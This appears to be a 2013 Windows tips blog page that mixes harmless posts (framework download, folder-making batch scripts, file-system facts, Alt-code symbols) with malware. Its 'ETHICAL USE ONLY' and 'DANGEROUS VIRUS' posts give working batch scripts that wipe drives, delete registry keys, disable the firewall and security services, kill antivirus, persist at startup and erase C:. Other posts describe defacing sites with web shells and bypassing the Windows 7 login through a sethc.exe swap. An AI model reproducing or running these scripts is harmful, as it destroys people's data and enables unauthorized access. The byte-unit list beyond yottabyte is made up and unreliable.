Labels

Saturday, 23 March 2013

.NET FRAMEWORK VERSION-4

DOWNLOAD .NET FRAMEWORK VERSION-4 FROM LINK BELOW

The .NET Framework (pronounced dot net) is a software framework developed by Microsoft that runs primarily on Microsoft Windows. It includes a large library and provides language interoperability (each language can use code written in other languages) across several programming languages. Programs written for the .NET Framework execute in a software environment (as contrasted to hardware environment), known as the Common Language Runtime (CLR), an application virtual machine that provides services such as security, memory management, and exception handling. The class library and the CLR together constitute the .NET Framework.
The .NET Framework's Base Class Library provides user interface, data access, database connectivity, cryptography, web application development, numeric algorithms, and network communications. Programmers produce software by combining their own source code with the .NET Framework and other libraries. The .NET Framework is intended to be used by most new applications created for the Windows platform. Microsoft also produces an integrated development environment largely for .NET software called Visual Studio.

Download Link ==> .NET FRAMEWORK FULL V-4


DOWNLOAD PHOTO SCAPE SOFTWARE FROM LINK BELOW

Wednesday, 20 March 2013

Batch Based File/Folder Creation

You have a lot of movies in different genre folders and you want to  create a folder for each movie in the same genre folder as where the movie is.
The code run a batch file from the parent folder Movies, scan for all *.mkv *.avi *.mp4 files in the genre folders and create folders based on the movie names. The name of the folders should be:

if you want the folder will end with Moviename.movie .(moviename without extension).movie

@echo off
for /r "E:\movies\" %%d in (.) do (
    pushd %%d
    echo now in %%d
    for %%f in (*.avi *.mkv *.mp4) do (
        md "%%~nf.movie"
    )
    popd 
) 

if you want it only by the name of Movie.(moviename without extension)

@echo off
for /r "E:\movies\" %%d in (.) do (
    pushd %%d
    echo now in %%d
    for %%f in (*.avi *.mkv *.mp4) do (
        md "%%~nf"
    )
    popd 
)

Creating Directories with a empty file in it


Creating Directories with a empty file in it

setlocal enableextensions enabledelayedexpansion
set /a "x = 0"
:while1
    if %x% leq 10 (
        echo %x%
        MkDir "Folder %x%"
        echo. 2>"Folder %x%\MyFile.txt"
        set /a "x = x + 1"
        goto :while1
    )
endlocal

Creating X numbers of Directories through batch scripting


Creating X numbers of Directories through batch scripting

setlocal enableextensions enabledelayedexpansion
set /a "x = 0"
:while1
    if %x% leq 10 (
        echo %x%
        MkDir "Folder %x%"
        echo. 2>"Folder %x%"
        set /a "x = x + 1"
        goto :while1
    )
endlocal

Tuesday, 19 March 2013

IMAGE FORMATS

-->Image Format<--

JPEG   (Joint Photographic Experts Group)

JFIF    (JPEG File Interchange Format)
Exif     (Exchangeable image file format)
TIFF   (Tagged Image File Format)
RAW refers to a family of raw image formats
DNG   (Digital Negative) is an open raw image format
PNG   (Portable Network Graphics)
GIF   (Graphics Interchange Format)
BMP file format  (Windows bitmap)
PPM-portable pixmap file format,
PGM  (portable graymap file format)
PBM  (portable bitmap file format )
TGA  (TARGA)
ILBM  (InterLeaved BitMap)
PCX  (Personal Computer eXchange)
ECW  (Enhanced Compression Wavelet)
IMG (ERDAS IMAGINE Image)
SID (multiresolution seamless image database, MrSID)
CD5 (Chasys Draw Image)
FITS (Flexible Image Transport System)
PGF (Progressive Graphics File)

GOOGLE TRICKS

GOOGLE TRICKS


1. Dancing Google Logo

http://www.googleloco.com/

2. Feel The Gravity


http://mrdoob.com/projects/chromeexperiments/google_gravity/


3. All Google Logos

http://www.google.com/logos/
4. Google Calculator


Write something like 4+2 & hit Enter, Google will display the result.


5. Google Epic

http://www.toobigtouse.com/

6. Google Moon


http://www.google.com/moon/
7. Google In Black


http://www.ecoogle.co/

8. Put Your Name On Google Logo


http://www.funnylogo.info/


9. Mirror Image Of Google


http://elgoog.rb-hosting.de/index.cgi

10. Google Sphere



SHELL

WHAT A SHELL IS ??

After getting the admin access in the website attacker will upload his own control penal that’s called shell.

It helps attacker to maintain access for the long time. There are many types of shells like DDOSE shell, symlink shell etc. 

Using shell attacker can destroy whole database and he can leak the database of the website and using the shell he can root the server.
(Only Linux server can be rooted windows server cant be rooted because there is no ROOT :P) After rooting he can destroy whole server. Suppose One server contains 500 websites and attacker got the admin access in the single site and he have rooted that server then 500 sites can be destroyed ! 


USES OF SHELL:-


1. Using shell you can Destroy the INDEX page of the website 
2. You can host your files in the server :D 
3. You can root the server 

Now if you want to destroy the index page of the website then find the “INDEX” page from the list and replace that coding with your own deface page. And using browse option you can host your own file in the server. You can create your own shell and you can add your own tools in your shell. for that you know PHP.


# Educational purpose only............

ETHICAL USE ONLY

ETHICAL USE ONLY

Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key r :: run windowwill open and
type notepad and hit enter.
NOW TYPE THE FOLLOWING CODE ::

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

then save it as filename.bat and the batch file is created .
WARNING :: This is a dangerous virus
Delete the entire registry
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

now save it as filename.bat and the batch file is created .
Now here is most dangerousvirus that can corruptyour computer after using thisyou will not able to use your computer this will be the last time you will be using it if you have TO use your pc once again then you have to format all the drive using boot cd and install os once again 

FUN VIRUS

FUN VIRUS

Open Notepad and copy below code and save it with .bat extension

It will open multiple screens as it is in infinite loop.

@echo off
:a
start
start
start
start
start
start
goto:a

DANGEROUS VIRUS

Virus will do:

*. Copy itself for multiple times.
*. This will disable the restore option by deleting the restore file.
*. This will disable the login option.
*. If this affect the system, then the user can't use hisOS longer.


This is for Educational purpose only.We have put the half code to avoid misuse.


start
color 5
title You are totally screwed up , lol
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib r h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo"systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0%systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib r h virus.bat
attrib r h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now screwed up
msg * You got owned!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWScopy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat%userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP

NTFS and FAT File System

NTFS and FAT File System

FAT (File Allocation Table) andNTFS (New Technology File System) are two methods for storing data on a hard drive. The hard drive has to either be formatted using one or theother, or can be converted from one to the other (usuallyFAT to NTFS) using a system tool.
Differences Between FAT and NTFS
FAT 32

1) Fat 32 Allows access to win95, 98, win millenium, win2k, xp on local partition.
2) Maximum size of partition isupto 2 TB.
3) Maximum File size is upto 4GB.
4) File & folder Encryption is not possible.
NTFS
1) Allows access local to w2k, w2k3, XP, win 7 or 8 &later may get access for somefile.
2) Maximum size of partition ismore than 2 TB.
3) Maximum File size is upto 16TB.
4) File & folder Encryption is possible only in NTFS.
Converting FAT file system to NTFS
To convert a FAT partition to NTFS, perform the following steps.
- Click START > RUN > and type CMD (this will open your command prompt)
At the command prompt, type CONVERT [driveletter]: /FS:NTFS.
(Example: if you are converting drive C: . type CONVERT C: /FS:NTFS and enter)
Your partition will be converted to NTFS.

Make Google Chrome Browser Faster

3 Ways To Make Google Chrome Browser Faster

Tweak DNS Setting To Make Chrome
Browser Faster


Once you open Chrome browser, click on the
Spanner Icon which could be found on the right
side of the browser. And then click on Options
button.


There, find the Under the Hood button and click
on it. Under the Privacy section, uncheck the
option Use DNA pre-fetching to improve page
load performance and then click on the Close
button.


By doing this DNS tweak, you have actually
improved the way web pages load. So simply
restart Chrome browser and you would notice that
the speed has improved.


Clean History And Unused Data


Having huge history and unused data slows any any
browser and so is the case with Chrome too. So
once you launch the Chrome browser, press Ctrl +
Shift + Delete together and a new tab will open,
Clear Browsing Data.


Here, mark the options Clear browsing history,
Clear download history, Empty the cache and
Delete cookies and other site data and click
on Clear browsing data button.


Block Ads
There are number of ways to block ads. You can
use Chrome extensions like AdSweep or AdBlock
which would block the ads on the websites and
eventually would increase the speed. This will not
only make Chrome browser faster, but also offers a
clean look too.


In addition to above mentioned ways, you can use
features like Speed Dial and make the most of it in
order to make Chrome browser faster, cleaner and
better.

SQLMAP

sqlmap. 

Sqlmap is a penetration testing tool that
automates the process of detecting and
exploiting SQL injection flaws and taking over of
database servers. It comes with a detection
engine, many niche features, and a broad range
of switches including database fingerprinting,
data fetching from the database, and accessing
the underlying file system and executing
commands on the operating system via out-of-
band connections.

OPEN JDK JRE

OPEN JDK JRE

Many vulnerabilities were discovered in theOpenJDK JRE related to information disclosure
and data integrity. An attacker could exploitthese to cause a denial of service. Vulnerabilities
were discovered in the OpenJDK JRE related toinformation disclosure. Several data integrity
vulnerabilities were discovered in the OpenJDKJRE.

 
Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure
and data integrity. A vulnerability was discovered in the OpenJDK JRE related to availability. An attacker could exploit this to cause a denial ofservice. A vulnerability was discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit this to cause a denial of service. A data integrity vulnerability was discovered in
the OpenJDK JRE. An information disclosurevulnerability was discovered in the OpenJDK JRE. A vulnerability was discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit this to cause a denial of service.

PRADS

PRADS

PARADS is a "Passive Real-time Asset Detection
System". It passively listens to network traffic and
gathers information on hosts and services it sees.
This information can be used to map your
network, letting you know what services and
hosts are alive and used. It can also be used
together with your favorite IDS/IPS setup for
"event to host/service" correlation. It can help
you make sure that your inventory database is up
to date. PRADS commes in two versions. One
written in Perl, and one written in C. Some
features might only be found in one of the
versions.

Making a log file using notepad

Making a log file using notepad

Did you know that you can also use Notepad as a simple 

digital diary or a personal Log-Book ? Well, if you didn’t then 

follow the below mentioned steps to make one for

yourself ! 

Open Notepad.
Type .LOG (in capital letters) and hit enter. 
Save it with any name and close it. 
Open it again. 
When you open the file again you will see the current date and time being inserted
automatically after the .LOG line. This will happen automatically every time you reopen
the the notepad file.

Some useful information

Some useful information

Bit = 1 Binary Digit 
Byte = 8 Bit 
Kilobyte = 1024 Byte 
Megabyte = 1024 Kilobyte 
Gigabyte = 1024 Megabyte 
Terabyte = 1024 Gigabyte 
Petabyte = 1024 Terabyte 
Exabyte = 1024 Petabyte 
Zettabyte = 1024 Exabyte
Yottabyte = 1024 Zettabyte
Brontobyte = 1024 Yottabyte
Geopbyte = 1024 Brontobyte
Saganbyte = 1024 Geopbyte
Pijabyte = 1024 Saganbyte
Alphabyte = 1024 Pijabyte
Kryatbyte = 1024 Alphabyte
Amosbyte = 1024 Kryatbyte
Pectrolbyte = 1024 Amosbyte
Bolgerbyte = 1024 Pectrolbyte
Sambobyte = 1024 Bolgerbyte
Quesabyte = 1024 Sambobyte
Kinsabyte = 1024 Quesabyte
Rutherbyte = 1024 Kinsabyte
Dubnibyte = 1024 Rutherbyte
Seaborgbyte = 1024 Dubnibyte
Bohrbyte = 1024 Seaborgbyte
Hassiubyte = 1024 Bohrbyte
Meitnerbyte = 1024 Hassiubyte
Darmstadbyte = 1024 Meitnerbyte
Roentbyte = 1024 Darmstadbyte
Coperbyte = 1024 Roentbyte

ByPaSs window 7 login without any CD's

ByPaSs window 7 login without any CD's


Follow the steps to bypass:
1) Press the power button to turn on your computer.

2) While ur on the screen with the animated microsoft logo press and hold the power button until turn off.

3) Press the power button to turn on again.

4) You should now see the option to bunch Start Up repair.. Select the option and press enter.

5) Run Startup Repair.

6) You should see a blue bar tht moves across the screen repeatedly. Above it should be messages
tht say "searching for problems" or something. The message should change to "Attempting repairs" within a few minutes.


7) Leave the computer running. This message should be there for 10-40 minutes depending on your computer.
A message should pop up tht says "start up repair could not fix the problem". Click the arrow next to "show problem details".


8) Scroll to the bottom and click the lnk to the .txt .


9) Notepad should open up with the file.


10) In notepad click File->Open. You can now use the file browser to perform the sethc.exe hack .


11) Go to C:Windows\system32 and find sethc.exe and rename to random.exe or somethign.


12) Copy the cmd.exe and rename the copied file to sethc.exe


13) Restart the computer and at the login screen press the "shift" key 5 times n quick succession.


14) Type in the cmd window "control userpasswords2" without the quotation marks.


15) You can now make a new admin account and login
HOW TO CHANGE WINDOWS7 LOGIN SCREEN

How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.

1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.

2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.

3. You will need to copy this image to
C:\Windows\system32\oobe\info\backgrounds
You will need to create that path if it does not already exist on your computer.

4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key
HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\
LogonUI\Background

If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.

5. Double-click on OEMBackground and set the Value Data to 1.

6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.
HOW TO MAKE SYMBOLS WITH KEYBOARD

Alt + 0153..... ™... trademark symbol
Alt + 0169.... ©.... copyright symbol
Alt + 0174..... ®....registered trademark symbol
Alt + 0176 ...°......degree symbol
Alt + 0177 ...±....plus-or-minus sign
Alt + 0182 ...¶.....paragraph mark
Alt + 0190 ...¾....fraction, three-fourths
Alt + 0215 ....×.....multiplication sign
Alt + 0162...¢....the cent sign
Alt + 0161.....¡......upside down exclamation point
Alt + 0191.....¿.....upside down question mark
Alt + 1.......☺....smiley face
Alt + 2 ......☻.....black smiley face
Alt + 15.....☼.....sun
Alt + 12......♀.....female sign
Alt + 11.....♂......male sign
Alt + 6.......♠.....spade
Alt + 5.......♣......Club
Alt + 3.......♥......Heart
Alt + 4.......♦......Diamond
Alt + 13......♪.....eighth note
Alt + 14......♫......beamed eighth note
Alt + 8721.... ∑.... N-ary summation (auto sum)
Alt + 251.....√.....square root check mark
Alt + 8236.....∞.....infinity
Alt + 24.......↑.....up arrow
Alt + 25......↓......down arrow
Alt + 26.....→.....right arrow
Alt + 27......←.....left arrow
Alt + 18.....↕......up/down arrow
Alt + 29......↔...left right arrow